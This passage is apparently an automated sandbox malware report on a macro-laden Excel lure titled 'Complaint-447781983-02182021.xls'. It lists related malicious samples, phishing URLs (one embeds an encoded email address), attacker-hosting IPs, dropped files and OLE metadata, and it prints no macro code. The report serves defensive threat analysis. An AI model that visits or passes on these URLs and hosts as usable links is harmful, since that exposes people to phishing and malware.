                                                                                                                                                • 91.199.212.52
                                                                                                                                                http://zvzuholzrkbla.leedsvvest.com/Y2hhcmxlcy55ZWVAbGl2aWJhbmsuY29tGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                https://comvoce.philco.com.br/wp-forum/administracion/prelogin.phpGet hashmaliciousBrowse
                                                                                                                                                • 91.199.212.52
                                                                                                                                                UNIFIEDLAYER-AS-1USComplaint-447781983-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.80.6
                                                                                                                                                Payment Transfer Copy of $274,876.00 for the invoice shipments.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.116.112.43
                                                                                                                                                ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.87.196.120
                                                                                                                                                PO-A2174679-06.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.78.145
                                                                                                                                                22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                                                                                                                • 108.167.156.42
                                                                                                                                                CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                                                                                                                                                • 192.185.181.49
                                                                                                                                                PO.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.0.218
                                                                                                                                                Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 192.185.16.95
                                                                                                                                                ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.214.158.75
                                                                                                                                                AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.46.55
                                                                                                                                                iAxkn PDF.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.100.181
                                                                                                                                                carta de pago pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.5.166
                                                                                                                                                PO.exeGet hashmaliciousBrowse
                                                                                                                                                • 108.179.232.42
                                                                                                                                                payment details.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 50.87.95.32
                                                                                                                                                new order.exeGet hashmaliciousBrowse
                                                                                                                                                • 108.179.232.42
                                                                                                                                                CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                                                                                                                                                • 192.185.181.49
                                                                                                                                                RdLlHaxEKP.exeGet hashmaliciousBrowse
                                                                                                                                                • 162.214.184.71
                                                                                                                                                Drawings2.exeGet hashmaliciousBrowse
                                                                                                                                                • 198.57.247.220
                                                                                                                                                EFT Remittance.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.120.180
                                                                                                                                                Remittance Advice.xlsGet hashmaliciousBrowse
                                                                                                                                                • 162.241.120.180

                                                                                                                                                JA3 Fingerprints

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19SHIPPING-DOCUMENT.docxGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                REVISED ORDER 2322020.EXEGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                PO112000891122110.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                OutplayedInstaller (1).exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                Facecheck - app-Installer (1).exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                Buff-Installer (9).exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                coltTicket#513473.htmGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                FortPlayerInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                RGB HeroInstaller.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                Buff-Installer.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                unmapped_executable_of_polyglot_duke.dllGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                smartandfinalTicket#51347303511505986.htmGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                f4b1bde3-706a-40d2-8ace-693803810b6f.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                LIQUIDACION INTERBANCARIA 02_22_2021.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                document-550193913.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                GUEROLA INDUSTRIES N#U00ba de cuenta.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                receipt145.htmGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                xerox for hycite.htmGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                SecuriteInfo.com.Heur.15528.xlsGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100
                                                                                                                                                Muligheds.exeGet hashmaliciousBrowse
                                                                                                                                                • 138.36.237.100

                                                                                                                                                Dropped Files

                                                                                                                                                No context

                                                                                                                                                Created / dropped Files

                                                                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\30D802E0E248FEE17AAF4A62594CC75A
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1559
                                                                                                                                                Entropy (8bit):7.399832861783252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:B4wgi+96jf8TXJgnXpxi4sVtcTtrdoh+S:KiIq0eZnep
                                                                                                                                                MD5:ADAB5C4DF031FB9299F71ADA7E18F613
                                                                                                                                                SHA1:33E4E80807204C2B6182A3A14B591ACD25B5F0DB
                                                                                                                                                SHA-256:7FA4FF68EC04A99D7528D5085F94907F4D1DD1C5381BACDC832ED5C960214676
                                                                                                                                                SHA-512:983B974E459A46EB7A3C8850EC90CC16D3B6D4A1505A5BCDD710C236BAF5AADC58424B192E34A147732E9D436C9FC04D896D8A7700FF349252A57514F588C6A1
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                Preview: 0...0..........}[Q&.v...t...S..0...*.H........0..1.0...U....US1.0...U....New Jersey1.0...U....Jersey City1.0...U....The USERTRUST Network1.0,..U...%USERTrust RSA Certification Authority0...181102000000Z..301231235959Z0..1.0...U....GB1.0...U....Greater Manchester1.0...U....Salford1.0...U....Sectigo Limited1705..U....Sectigo RSA Domain Validation Secure Server CA0.."0...*.H.............0.........s3..< ....E..>..?.A.20.l.......-?.M......b..Hy...N..2%.....P?.L.@*.9.....2A.&.#z. ... .<.Do.u..@.2.....#>...o]Q.j.i.O.ri..Lm.....~......7x...4.V.X....d[.7..(h.V...\......$..0......z...B......J.....@..o.BJd..0.....'Z..X......c.oV...`4.t........_.........n0..j0...U.#..0...Sy.Z.+J.T.......f.0...U........^.T...w.......a.0...U...........0...U.......0.......0...U.%..0...+.........+.......0...U. ..0.0...U. .0...g.....0P..U...I0G0E.C.A.?http://crl.usertrust.com/USERTrustRSACertificationAuthority.crl0v..+........j0h0?..+.....0..3http://crt.usertrust.com/USERTrustRSAAddTrustCA.crt0%..+.....0.
                                                                                                                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\30D802E0E248FEE17AAF4A62594CC75A
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):282
                                                                                                                                                Entropy (8bit):3.129725157113391
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:kkFklp7eykltfllXlE/lPbXx8bqlF8tlije9DZl2i9XYolzlIlMltuN7ANJbZ15z:kKms8jXxp9jKFlIaYM2+/LOjA/
                                                                                                                                                MD5:67FB835F22BC7093A5ECFD80F7BB68D7
                                                                                                                                                SHA1:83D1A30B13FE58549A6C20423F73D77E0EC32E39
                                                                                                                                                SHA-256:79E601F80A121E73B3417E207319969CF2DE8A037EE2B96CB1A2D9F88DA5B8DA
                                                                                                                                                SHA-512:2AEBD221A791B77343273ED6CE37EC00A7C57C9ED08F5D7F96260CF576E8321746E47770183DA227F5B6B8A155C5604B36D68BB97D72F9C079B4D0FD02FE1DC3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: p...... ...........k....(....................................................... ........@u.>r..@8..................h.t.t.p.:././.c.r.t...s.e.c.t.i.g.o...c.o.m./.S.e.c.t.i.g.o.R.S.A.D.o.m.a.i.n.V.a.l.i.d.a.t.i.o.n.S.e.c.u.r.e.S.e.r.v.e.r.C.A...c.r.t...".5.b.d.b.9.3.8.0.-.6.1.7."...
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\4C99B3FD-0FAA-455B-8960-C99FC42FE1C8
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):132891
                                                                                                                                                Entropy (8bit):5.375867383663069
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:bcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:TcQ9DQW+z0XiK
                                                                                                                                                MD5:17626CC8CC2FA19C8480F81AA2D86C85
                                                                                                                                                SHA1:D5D9C531001CA671D180743B31396D1905D9E88E
                                                                                                                                                SHA-256:234CA312A08DA031D6F85D916DE02DC4104B84050C0BBFE1EA11FDA806E796B8
                                                                                                                                                SHA-512:2A0F4B952BBD0DB18843644643D0055F1083CBDCD0580791DD61FA2CC56CC285DDCB13852327A275745DE428F4F9D69F541C6981E362AF72B82FA82A3718C25A
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-23T13:25:49">.. Build: 16.0.13822.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                C:\Users\user\AppData\Local\Temp\A8A40000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31494
                                                                                                                                                Entropy (8bit):7.641881919106936
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:A2Y9JPWEt4wFVfViKzV8aoVT0QNuzWKPqSFpBHRb7y3Tud3KyoqjNHs+q:J2hViKiW+u7qS7BHRbu3TukqRtq
                                                                                                                                                MD5:D7DBDDF0041076A4623D6AFE6B3D3190
                                                                                                                                                SHA1:08CA102A9D7587421DD767EF9CA0B2F75E2EEACA
                                                                                                                                                SHA-256:6865B0727ED18B3D59FE2FD3872101BD408175F7AB1B2CD7F3CF8189C2C34A33
                                                                                                                                                SHA-512:CD4ECC97DBF032171AABF362B5D123A7B04B67DCB22BCBAC2E67F832C4194C86032C2893FD0997B1C1F7EF6695D49F3CC768DA8B316975CDEBBB9F5B56C7B3F3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: .U.N.0...?D......5e1.r....\.6..|....[.C.m.l.s..8.._-... ...eg.U.W.u-..p[_...pJ..eK@v59.1~X.....[..~q...+......|.".k.x.r.:...O..K.R.2....a&.M.n.4.r.\...T...<."..}B...."Qi..O.j?.i...GKf...... Y...c...(..B3..a....B.c......y.c..Z....F....1.......}.O..7.Ir4.kXH0M...BF........^..P*H..vv...d.j.J......P#....Ce.D|.L....\.........~..H.)."..O..o7.{....s......&..{...{..............9.a..k...:...a.D...."5.+.|J)P[.y9.'/.......PK..........!.......V.......[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Complaint-447781983-02182021.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:50 2020, mtime=Tue Feb 23 12:25:52 2021, atime=Tue Feb 23 12:25:52 2021, length=60928, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2290
                                                                                                                                                Entropy (8bit):4.676967723252077
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:8QjGGx/XPSH+GAAUbYT8DY7aB6myQjGGx/XPSH+GAAUbYT8DY7aB6m:8Qjx/XqnXUWQB6pQjx/XqnXUWQB6
                                                                                                                                                MD5:CDE505662EF3E97428636524621C4CC5
                                                                                                                                                SHA1:ADC9BA4474455E6CC78FB077C99B016C97EB2526
                                                                                                                                                SHA-256:C69D03931C69779E169414DD35CF57F7D3C5EA5F740C8ABB0DC8DC2B3334D39E
                                                                                                                                                SHA-512:46059481F45016EBA0FBE61C56F0C093C5FEFFF7B9BA9E7E2546B6309DB20A58FD01106B50B9A25CAA471DBB53CD43BF9E27F1F3EE49703EF503B1AE8A8AE348
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.... ...h..Q.....iXh.....iXh.................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR0k....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..WR0k....#J........................j.o.n.e.s.....~.1.....>Q|<..Desktop.h.......N..WR0k.....Y..............>........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..WR6k .COMPLA~1.XLS..r......>Qz<WR6k.....V........................C.o.m.p.l.a.i.n.t.-.4.4.7.7.8.1.9.8.3.-.0.2.1.8.2.0.2.1...x.l.s.......f...............-.......e...........>.S......C:\Users\user\Desktop\Complaint-447781983-02182021.xls..7.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.o.m.p.l.a.i.n.t.-.4.4.7.7.8.1.9.8.3.-.0.2.1.8.2.0.2.1...x.l.s.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Feb 23 12:25:52 2021, atime=Tue Feb 23 12:25:52 2021, length=8192, window=hide
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):904
                                                                                                                                                Entropy (8bit):4.654008658396181
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:8McXUvJjduCH2POXAyDXOVs5Cm+WrjAZ/DYbDkLSeuSeL44t2Y+xIBjKZm:8Mx/XmV4CkAZbcDA7aB6m
                                                                                                                                                MD5:0909656D991462AF73F5D517D79FBAC5
                                                                                                                                                SHA1:166ED100EB72AFF58669562F97C2EF69EB19FC86
                                                                                                                                                SHA-256:3A3E9F1C9D5023143AE8E8B4913EE66F96FB0ADB1FF7410733BDA98DAA4596EE
                                                                                                                                                SHA-512:ED32D74B0D48F2E7EB8C64FCE2720EE9F261B31C3C5EB4DD6FBE980C2FDCABBBCE0078855DEB201BA42A6F51407DBADF256C4380021C0BDC3CD1CB4AAD02FE82
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: L..................F.............-..7.Nh....7.Nh..... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..WR0k....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..WR0k....#J........................j.o.n.e.s.....~.1.....WR;k..Desktop.h.......N..WR;k.....Y..............>.....J...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......367706...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):137
                                                                                                                                                Entropy (8bit):4.791427181491947
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:oyBVomMYlIiSWcz0FXrl+1lIiSWcz0FXrlmMYlIiSWcz0FXrlv:dj6Yl4ubal4ubxYl4ub1
                                                                                                                                                MD5:733D335954A7C87A9071F01D9ACBE348
                                                                                                                                                SHA1:1AE168C09F0041C079663BCD4AB9162F33CD7623
                                                                                                                                                SHA-256:87A461F640E439196E55DB894090873D4B9F7FC9D895E4DCD13B2346165BA1B6
                                                                                                                                                SHA-512:04CB3D8787A8BA5A86F04E8162756D4A93DB3A2A8BDEB6E6128376E1EBF2978177B3B0A4986D3723DA6159C39765E5C0E76DE63097CD5A9289E37E1EC141A1E9
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:low
                                                                                                                                                Preview: Desktop.LNK=0..[xls]..Complaint-447781983-02182021.LNK=0..Complaint-447781983-02182021.LNK=0..[xls]..Complaint-447781983-02182021.LNK=0..
                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22
                                                                                                                                                Entropy (8bit):2.9808259362290785
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                C:\Users\user\Desktop\59A40000
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):111230
                                                                                                                                                Entropy (8bit):6.668853911800476
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:8s8rmOAIyyzElBIL6lECbgBGzP5xLm7TdK79nGzeNR69mGzeNRlDGzeNR6Gs8rma:F8rmOAIyyzElBIL6lECbgB+P5Nm7TdKn
                                                                                                                                                MD5:56AEACF20EEC43D6FE9469D4D54B1E77
                                                                                                                                                SHA1:BB1F142DA8765D0CF38B8097018C94BE82E94E83
                                                                                                                                                SHA-256:B2055DF49308485C5E6E8527498647782535556F2B107368264BE663D496AC3D
                                                                                                                                                SHA-512:74B62A889B58AED884F6F475DADDB160E449294EE71D9A4F5DDD6B79B645A0E40B3A50285E2D437FEF37F2D428329DE2B04C4AB8D56C156DC0964732D5B091E1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview: ........T8..........................\.p....pratesh B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1...,...8........q..C.a.l.i.b.r.i.1.......8........q..C.a.l.i.b.r.i.1.......8........q..C.a.l.i.b.r.i.1...h...8........q..C.a.m.b.r.i.a.1.......4........q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................q..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1.......>........8..C.a.l.i.b.r.i.1.......?........8..C.a.l.i.b.r.i.1.......4........8..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1.......<........8..C.a.l.i.b.r.i.1................8..C.a.l.i.b.r.i.1.............

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
                                                                                                                                                Entropy (8bit):3.697666945848156
                                                                                                                                                TrID:
                                                                                                                                                • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                File name:Complaint-447781983-02182021.xls
                                                                                                                                                File size:145920
                                                                                                                                                MD5:60f845a847e771a59b97d456c494f69d
                                                                                                                                                SHA1:bf79e4535e5d15cfbd4c6eb2fa2d086703ad81d6
                                                                                                                                                SHA256:c44df560766b2a3f60adba4ef6448e266a3036e19fc1631ae9ada22628447319
                                                                                                                                                SHA512:e942975e9b88c1e3783fa7723b8dcaf4cf1acc63e36380a56543ab96393815df27426169d38235790314de18590b0ed1363d38296e3b4a5543dba0f849f103e0
                                                                                                                                                SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/V:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMU
                                                                                                                                                File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OLE
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "Complaint-447781983-02182021.xls"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:True
                                                                                                                                                Application Name:Microsoft Excel
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:False
                                                                                                                                                Contains Workbook/Book Stream:True
                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Code Page:1251
                                                                                                                                                Author:
                                                                                                                                                Last Saved By:Friner
                                                                                                                                                Create Time:2006-09-16 00:00:00
                                                                                                                                                Last Saved Time:2021-02-18 13:42:21
                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Document Code Page:1251
                                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                                Contains Dirty Links:False

                                                                                                                                                Streams

                                                                                                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4096
                                                                                                                                                Entropy:0.321292606979
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                                                                                                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                General
                                                                                                                                                Stream Path:\x5SummaryInformation
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4096
                                                                                                                                                Entropy:0.2746714277
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 135085
                                                                                                                                                General
                                                                                                                                                Stream Path:Book
                                                                                                                                                File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                Stream Size:135085
                                                                                                                                                Entropy:3.69042254796
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                                                                                                                                                Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                Macro 4.0 Code

